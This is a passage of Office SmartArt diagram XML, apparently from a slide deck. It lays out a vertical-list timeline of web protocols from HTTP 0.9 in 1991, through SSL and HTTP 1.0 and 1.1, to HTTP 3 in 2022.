      <dgm:prSet presAssocID="{D95346B0-3D1E-45CE-AFEE-A449C1A99591}" presName="parentText" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D484A84E-EA4F-4D9D-B8BC-28C6DF1094B5}" type="pres">
      <dgm:prSet presAssocID="{D95346B0-3D1E-45CE-AFEE-A449C1A99591}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="4" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{F5B73301-B94C-4C46-9B7D-49DD84D23818}" type="presOf" srcId="{1809CAD3-9A4E-4334-BC43-92C78AB69E3E}" destId="{7298B8CE-AFE1-474D-947D-FD31FC2F5AF4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{2E600A17-684C-40F6-A520-D38BF1DF8255}" type="presOf" srcId="{A9984371-32EC-43AE-A91B-E83B20DDFFF9}" destId="{2FA8E784-179B-433E-9527-A02382773419}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F0C3CF1F-FA11-4770-BA83-FED37E36E7B7}" srcId="{E5332117-109D-4804-AD58-7126A7FC35CF}" destId="{D95346B0-3D1E-45CE-AFEE-A449C1A99591}" srcOrd="4" destOrd="0" parTransId="{3DF8D196-AB49-494E-B760-07D65F8B41DC}" sibTransId="{5AF8DF7D-AE08-41B4-BFA9-3EE3B41EC81D}"/>
    <dgm:cxn modelId="{90C96622-7319-4533-932D-A0EE488E97A5}" srcId="{E5332117-109D-4804-AD58-7126A7FC35CF}" destId="{14B3B754-7C2F-44F3-93C8-65D9FD0885A8}" srcOrd="1" destOrd="0" parTransId="{3B90488F-D89F-4B9C-9D36-31193ACF4F33}" sibTransId="{B2EE5D2A-B409-43CB-ACA6-00811929E4F3}"/>
    <dgm:cxn modelId="{B1D4B737-698F-4662-A01A-F5A5C3C5F7CD}" type="presOf" srcId="{14B3B754-7C2F-44F3-93C8-65D9FD0885A8}" destId="{DB1A3BE9-9B78-4AFE-8A6E-29A22A639043}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A3185945-747E-4BFB-9B72-2ECC509F341A}" srcId="{E5332117-109D-4804-AD58-7126A7FC35CF}" destId="{E60D4751-F199-45D2-A8E2-8BF33086FD90}" srcOrd="2" destOrd="0" parTransId="{E03A0D60-E467-4F06-A2E7-B893D224B7EC}" sibTransId="{B23329F1-316E-47B0-A863-234FF3C0B31B}"/>
    <dgm:cxn modelId="{58668867-B6E6-44BC-842D-B6966ACA9149}" srcId="{D95346B0-3D1E-45CE-AFEE-A449C1A99591}" destId="{64B4901B-65DD-4E23-BC18-D51BCF4106E9}" srcOrd="0" destOrd="0" parTransId="{A955FBB4-5BE4-440C-BEA3-E0C112E6B148}" sibTransId="{3AB6892A-BFB5-4329-A638-B7F8C4AAADF3}"/>
    <dgm:cxn modelId="{8AA7D769-94A3-4A78-AA97-B5C8BC26D616}" type="presOf" srcId="{D95346B0-3D1E-45CE-AFEE-A449C1A99591}" destId="{33984A3E-1F32-441C-AF50-6AC981545AF5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{CC4CBD72-844E-4759-9BBD-36062FD446D8}" type="presOf" srcId="{E60D4751-F199-45D2-A8E2-8BF33086FD90}" destId="{F27D59E6-31A2-4A2A-95B6-4C12DBFAF86F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{2D782E73-CBF2-4A3B-AB7B-D4F8686FF33E}" type="presOf" srcId="{4416EC81-8357-41D7-9E09-813096865FFF}" destId="{F0778054-FC64-4761-AD34-6E2D87DB85C4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{1B312974-6B34-4267-9412-D86B236071C8}" srcId="{D4ADA193-12A7-4CA1-903D-2CEDE1F47ACF}" destId="{6CF38A95-43AE-45F1-9ACB-679AA28C632B}" srcOrd="0" destOrd="0" parTransId="{2E61C4E7-F0A2-401E-A95E-A67B61810538}" sibTransId="{6390371B-DE08-4530-8BBB-11BF0AF918E4}"/>
    <dgm:cxn modelId="{22484D7A-7373-4F1F-B6E2-A8C0F0B696FF}" type="presOf" srcId="{64B4901B-65DD-4E23-BC18-D51BCF4106E9}" destId="{D484A84E-EA4F-4D9D-B8BC-28C6DF1094B5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{5106037F-9E9D-4B7B-8E18-E8B9BE9BD63E}" type="presOf" srcId="{428CE966-BD13-45A1-9649-D5C40AD27F7C}" destId="{D484A84E-EA4F-4D9D-B8BC-28C6DF1094B5}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{325A8080-1DFB-4E4C-B554-04526D9AFD18}" srcId="{E5332117-109D-4804-AD58-7126A7FC35CF}" destId="{D4ADA193-12A7-4CA1-903D-2CEDE1F47ACF}" srcOrd="0" destOrd="0" parTransId="{D17B511D-F67C-4F18-913E-70AFAA670DA0}" sibTransId="{1DB8A4E9-D137-44EC-ACD9-213A1961EB21}"/>
    <dgm:cxn modelId="{E2EE7683-8066-4645-A0CA-843285C458F4}" type="presOf" srcId="{E5332117-109D-4804-AD58-7126A7FC35CF}" destId="{198931A1-8DA7-4DF0-A5BD-6FD9E8B2114D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A98D3F8A-8B35-4ACC-A179-17E310114869}" srcId="{A9984371-32EC-43AE-A91B-E83B20DDFFF9}" destId="{1809CAD3-9A4E-4334-BC43-92C78AB69E3E}" srcOrd="0" destOrd="0" parTransId="{1ED66D31-43B8-4314-9046-04C4F23FFAA2}" sibTransId="{925DA8A5-B1CC-4A56-BF0E-CBA424FB1683}"/>
    <dgm:cxn modelId="{3243459E-64A7-4A46-8972-0117B88D88AD}" type="presOf" srcId="{6CF38A95-43AE-45F1-9ACB-679AA28C632B}" destId="{B943B39B-79DA-482F-841A-5EE3E2C857E0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{E4997ACD-F0A1-4500-9D26-7BE021D67A43}" type="presOf" srcId="{D4ADA193-12A7-4CA1-903D-2CEDE1F47ACF}" destId="{5A2FE17F-A587-4C42-B508-8210B5A6B3F7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{8FB9F4DB-FCCF-46B4-A35A-B3C393299050}" srcId="{E5332117-109D-4804-AD58-7126A7FC35CF}" destId="{A9984371-32EC-43AE-A91B-E83B20DDFFF9}" srcOrd="3" destOrd="0" parTransId="{7C1ED678-3D83-49A4-AA12-1D7ED07978AF}" sibTransId="{AB054031-1021-4329-9D5F-67356FAE6654}"/>
    <dgm:cxn modelId="{D025C6E5-F90A-4967-AA5F-8E1C21661BB4}" srcId="{E60D4751-F199-45D2-A8E2-8BF33086FD90}" destId="{4416EC81-8357-41D7-9E09-813096865FFF}" srcOrd="0" destOrd="0" parTransId="{07F2E67D-DDC1-4B6F-96EB-EEA0D38BC9E2}" sibTransId="{46961E5D-6A99-4E8B-9DC9-5C5D33623504}"/>
    <dgm:cxn modelId="{392F1CEB-EFDD-4A34-A9D5-7CE246DE615B}" type="presOf" srcId="{C8B24840-1E1B-4D93-803E-F691DF8C1684}" destId="{7FAEC8B6-DAA0-4C38-986A-FFB4199A8AF2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B3372CFB-DC6F-45CB-BEE2-829F62D3BA42}" srcId="{D95346B0-3D1E-45CE-AFEE-A449C1A99591}" destId="{428CE966-BD13-45A1-9649-D5C40AD27F7C}" srcOrd="1" destOrd="0" parTransId="{5B1602E3-62D7-44B5-94C0-609911BD305C}" sibTransId="{1FD4A9AF-6176-4924-BCA2-AA050B40C15D}"/>
    <dgm:cxn modelId="{77318AFD-27BD-4936-A6A2-8079E3ED1F4A}" srcId="{14B3B754-7C2F-44F3-93C8-65D9FD0885A8}" destId="{C8B24840-1E1B-4D93-803E-F691DF8C1684}" srcOrd="0" destOrd="0" parTransId="{92124836-B392-409F-A25F-3B2663C2E059}" sibTransId="{025ED1FE-6B6C-4446-B41D-38726A7E08E0}"/>
    <dgm:cxn modelId="{DF75D88C-4D92-44FB-91DE-C7915E81B73B}" type="presParOf" srcId="{198931A1-8DA7-4DF0-A5BD-6FD9E8B2114D}" destId="{02AB77AC-AAB5-4629-867C-3D963C869B8D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{9365E2D0-37B4-4664-A885-302A74F916EF}" type="presParOf" srcId="{02AB77AC-AAB5-4629-867C-3D963C869B8D}" destId="{5A2FE17F-A587-4C42-B508-8210B5A6B3F7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{0D3728DF-5228-4F74-995F-488606549901}" type="presParOf" srcId="{02AB77AC-AAB5-4629-867C-3D963C869B8D}" destId="{B943B39B-79DA-482F-841A-5EE3E2C857E0}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{4DBF1E97-60F9-4BEB-8DA2-442F3B3256A5}" type="presParOf" srcId="{198931A1-8DA7-4DF0-A5BD-6FD9E8B2114D}" destId="{67BE3F9A-2C44-458A-91AD-6C390DA07DA4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{68BCC5AE-36E7-4FA3-84C3-0CEAF17C5B9E}" type="presParOf" srcId="{198931A1-8DA7-4DF0-A5BD-6FD9E8B2114D}" destId="{693D9106-4996-4393-83AC-E6F9AD2B5AFB}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{65385C31-8B88-48B9-A138-2C6709E9C47D}" type="presParOf" srcId="{693D9106-4996-4393-83AC-E6F9AD2B5AFB}" destId="{DB1A3BE9-9B78-4AFE-8A6E-29A22A639043}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F0487656-9613-41EB-8F86-FF4D0B53B94A}" type="presParOf" srcId="{693D9106-4996-4393-83AC-E6F9AD2B5AFB}" destId="{7FAEC8B6-DAA0-4C38-986A-FFB4199A8AF2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{9B89F6F9-7BF5-4FB4-BDE7-93DB4EF80547}" type="presParOf" srcId="{198931A1-8DA7-4DF0-A5BD-6FD9E8B2114D}" destId="{DF91A22D-2A92-40E7-A2C8-5F1D2EF94702}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{71F46440-D61F-42C6-A465-0B60B31F17CE}" type="presParOf" srcId="{198931A1-8DA7-4DF0-A5BD-6FD9E8B2114D}" destId="{38857B64-6BA6-4971-B34C-E0525422464B}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{FD689A64-B87B-4D03-990B-8A045E1F491E}" type="presParOf" srcId="{38857B64-6BA6-4971-B34C-E0525422464B}" destId="{F27D59E6-31A2-4A2A-95B6-4C12DBFAF86F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{E74B3E7F-CA43-41D9-A9F8-FE596B1F1C32}" type="presParOf" srcId="{38857B64-6BA6-4971-B34C-E0525422464B}" destId="{F0778054-FC64-4761-AD34-6E2D87DB85C4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{EE4B0432-0731-4500-935C-66BAB00DDE0A}" type="presParOf" srcId="{198931A1-8DA7-4DF0-A5BD-6FD9E8B2114D}" destId="{A534D117-47F7-4FFA-923F-E6D226E58156}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{90BB5A6C-596A-498E-82DB-A51561E79A2D}" type="presParOf" srcId="{198931A1-8DA7-4DF0-A5BD-6FD9E8B2114D}" destId="{E612F279-5880-4F33-B17B-B61175A3E709}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{CF2DE2ED-ADC0-48DA-9655-CFC2AC2FFB48}" type="presParOf" srcId="{E612F279-5880-4F33-B17B-B61175A3E709}" destId="{2FA8E784-179B-433E-9527-A02382773419}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{DAEE71A8-14E7-466D-BEEF-5A33D9CEAED4}" type="presParOf" srcId="{E612F279-5880-4F33-B17B-B61175A3E709}" destId="{7298B8CE-AFE1-474D-947D-FD31FC2F5AF4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A911E23A-7A14-48B5-BF33-DD2B979A2219}" type="presParOf" srcId="{198931A1-8DA7-4DF0-A5BD-6FD9E8B2114D}" destId="{AE04DB8E-4758-47B8-8D35-D6E30D52D9D4}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{ABC39F56-83C6-418F-B20E-26699DE518BA}" type="presParOf" srcId="{198931A1-8DA7-4DF0-A5BD-6FD9E8B2114D}" destId="{6C4D95E3-03AB-4791-B9DD-CCA3C3B37E2F}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{24E02318-A62F-469B-8836-EE8CB63E5A61}" type="presParOf" srcId="{6C4D95E3-03AB-4791-B9DD-CCA3C3B37E2F}" destId="{33984A3E-1F32-441C-AF50-6AC981545AF5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{E6E78B00-438D-4D61-82A0-92E88211EA13}" type="presParOf" srcId="{6C4D95E3-03AB-4791-B9DD-CCA3C3B37E2F}" destId="{D484A84E-EA4F-4D9D-B8BC-28C6DF1094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41FF72-4609-46FE-B1A5-CA4E3FB166C3}"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06BF395D-6D3E-4ECC-B435-4FEE9D9F81A0}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2800"/>
            <a:t>1991</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0CC38682-EC9A-44ED-966F-3C8D6019FB56}" type="parTrans" cxnId="{BC4ABFC4-A6AE-4FB2-AA7A-89C91BEB23B1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{578DD111-11C3-4CF8-903B-97F01C4D5CD0}" type="sibTrans" cxnId="{BC4ABFC4-A6AE-4FB2-AA7A-89C91BEB23B1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5A5BAA1A-E72D-4EE5-BB8C-CCE45794FE5B}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2800"/>
            <a:t>HTTP 0.9</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{354C19D9-75F4-4673-AB87-08B8E19275AA}" type="parTrans" cxnId="{A666FC9B-D6F3-4F59-8E1C-B01493BB6A9A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6B88D4CF-C92D-4431-AD9E-CC49B0410BF1}" type="sibTrans" cxnId="{A666FC9B-D6F3-4F59-8E1C-B01493BB6A9A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F4AB946F-C495-4BD6-845C-EC175D2A5A73}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2800"/>
            <a:t>1995</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3880E99C-ED30-4117-8112-E7D3F4C9EF30}" type="parTrans" cxnId="{4CD9143C-6D43-47CA-AAD6-18A5A50E6CDB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FE1478B4-E2E6-4AFD-BE8B-E015AA8114F7}" type="sibTrans" cxnId="{4CD9143C-6D43-47CA-AAD6-18A5A50E6CDB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{828C80CA-58E8-42E8-9FF2-68F6D274AB29}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2800"/>
            <a:t>SSL</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{60931944-1771-4905-BD2A-329721520E1B}" type="parTrans" cxnId="{3B59195D-B938-4A71-806F-5AEA8CE53AFE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F2246164-5D48-4D63-AE14-642E5108BD87}" type="sibTrans" cxnId="{3B59195D-B938-4A71-806F-5AEA8CE53AFE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{841C1A9D-094F-4A31-B788-E7BDEE0826FA}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2800"/>
            <a:t>1996</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{85F87F4E-F96F-48D0-8FCE-04F0CB54A048}" type="parTrans" cxnId="{8AD1B0E3-865C-483B-9662-23CA4185BD92}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B57DC10C-8286-4FFA-85BE-EF9BB3A8FB52}" type="sibTrans" cxnId="{8AD1B0E3-865C-483B-9662-23CA4185BD92}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2155F7B1-3E41-4FE1-A580-9F40AAB75CDC}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2800"/>
            <a:t>HTTP 1.0</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B0F4EB21-F07B-4694-BEA5-A1E375CFFF08}" type="parTrans" cxnId="{B4D044D5-64A3-4C32-99F7-41F868391F8C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F9E69B40-49AB-4833-98AA-01866A16461A}" type="sibTrans" cxnId="{B4D044D5-64A3-4C32-99F7-41F868391F8C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{428FA987-66A9-4817-A6E5-D2943CAC26A3}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2800"/>
            <a:t>1997</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{49A7E924-133A-4E60-9646-781E17860012}" type="parTrans" cxnId="{E2396FC2-7AEC-4735-A8C7-4622B347E156}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8EEC1F55-8D72-46A1-9624-AC377E61D334}" type="sibTrans" cxnId="{E2396FC2-7AEC-4735-A8C7-4622B347E156}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{48175535-F0B7-4254-BCF8-5F5B759DA447}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2800"/>
            <a:t>HTTP 1.1</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A7D773F9-0482-45C5-8626-7CC84F560D52}" type="parTrans" cxnId="{A34A08B0-F70B-4424-BC55-EF165DD004E5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2C9F7E5C-FDCB-4FBD-892E-01AF3B3199EF}" type="sibTrans" cxnId="{A34A08B0-F70B-4424-BC55-EF165DD004E5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D68455E9-A7EC-45AE-B7D1-A65B5476A02A}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2800"/>
            <a:t>2015</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6083ECAC-012C-4BD8-A745-0E45C9EBC0F5}" type="parTrans" cxnId="{DC02823F-98EA-41B9-88F1-B1DA76246847}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9DA78237-B950-4E52-B75E-9357010CE37A}" type="sibTrans" cxnId="{DC02823F-98EA-41B9-88F1-B1DA76246847}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B67C7D49-E5F5-4E29-A068-4031D734D0B1}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2800"/>
            <a:t>HTTP 2</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D77B0BFB-DFE9-4E9D-B36F-08438274C2B1}" type="parTrans" cxnId="{8186E260-3B31-42BA-98E0-E9F8DD1B2B1C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A0FA011D-5F91-4D82-897A-E70BDF1E9F81}" type="sibTrans" cxnId="{8186E260-3B31-42BA-98E0-E9F8DD1B2B1C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{65810672-5E43-4BDC-ACCE-608FFFC4CD7F}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2800"/>
            <a:t>2022</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6C084864-6270-47D6-9F9F-121F540933A8}" type="parTrans" cxnId="{340BA029-9A5A-4653-B17F-5F0CBC3ED7E5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{072C6CC7-4FFE-4097-8F94-8B777B94471D}" type="sibTrans" cxnId="{340BA029-9A5A-4653-B17F-5F0CBC3ED7E5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9AB148CE-C783-46D7-B68F-52820899CFD4}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2800"/>
            <a:t>HTTP 3</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A66552B1-8199-42FE-ACDC-7A3E40A4A565}" type="parTrans" cxnId="{A5F5FAC2-EA2C-431C-9326-DE4A7B29F74E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A5A1B835-4D88-460F-B308-D0CA20BFF3A8}" type="sibTrans" cxnId="{A5F5FAC2-EA2C-431C-9326-DE4A7B29F74E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F33DF626-0861-46F6-827D-E09E1FB2E509}" type="pres">
      <dgm:prSet presAssocID="{F741FF72-4609-46FE-B1A5-CA4E3FB166C3}" presName="Name0" presStyleCnt="0">
